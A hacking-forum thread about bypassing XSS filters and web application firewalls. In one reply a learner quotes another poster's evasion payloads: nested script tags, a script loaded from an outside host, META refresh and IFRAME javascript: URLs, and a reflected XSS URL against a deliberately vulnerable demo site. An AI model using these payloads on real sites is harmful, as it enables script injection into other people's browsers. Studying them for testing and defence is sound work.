Cenzic 232 Patent
Paid Advertising
sla.ckers.org is
ha.ckers sla.cking
Sla.ckers.org
Script obfuscation, filter evasion, IDS/IPS/WAF bypassing... this is where it should live. Because this topic is too big to live anywhere else. Phj33r! 
Go to Topic: PreviousNext
Go to: Forum ListMessage ListNew TopicSearchLog In
Bypass 2012 XSS
Posted by: Vaibs
Date: November 02, 2012 09:18AM

On my blog http://adf.ly/E81iz .

Xss bypassing without using alphanumeric characters.
Xss bypass without using <script>,",/,alert, etc.

Vaibs

Options: ReplyQuote
Re: Bypass 2012 XSS
Posted by: rickm
Date: November 07, 2012 04:36AM

Hi Vaibs

Thanks for share. I'm learning XSS and I loved your website, however I was unable to reproduce many of your payloads to bypass WAF. I'm using Firefox and I tested it against the IBM WatchFire that is contructed to be vulnerable.

For example, this basic XSS input works as expected:

http://demo.testfire.net/search.aspx?txtSearch=<script>alert(1)</script>

However all your XSS payloads below are not working. Can you please take a look and if possible provide a working XSS payload for this site? I would love to test / see your payloads working.

When the inputbox is validated to enter limited characters:
'';!--"<XSS>=&{()}
!--"<XSS>=&amp;
'-!aleRT(3)/*'

When engine matching for <script> tag by detecting first opening “<” and first closing “>”.
<><<<SCRIPT><>>>alert('/Vaibs');//<<<</SCRIPT>>

When engine matches for </script> end tag.
<SCRIPT SRC=http://vaibs.in/blog< B >
or
<SCRIPT> aAlert(3);?/u>


.Meta tags never contribute toward headers but i can lead to XSS.
<META HTTP-EQUIV="refresh" CONTENT="0; url=javascript:ALERT(/Vaibs/);"/>

Iframes are not filtered by Waf many times so we can inject js inside.
<IFRAME src="javascript:Alert(/Vaibs/);"></IFRAME>

Thanks.

Options: ReplyQuote
Re: Bypass 2012 XSS
Posted by: hack2012
Date: June 04, 2013 09:46PM

thanks

Options: ReplyQuote


Sorry, only registered users may post in this forum.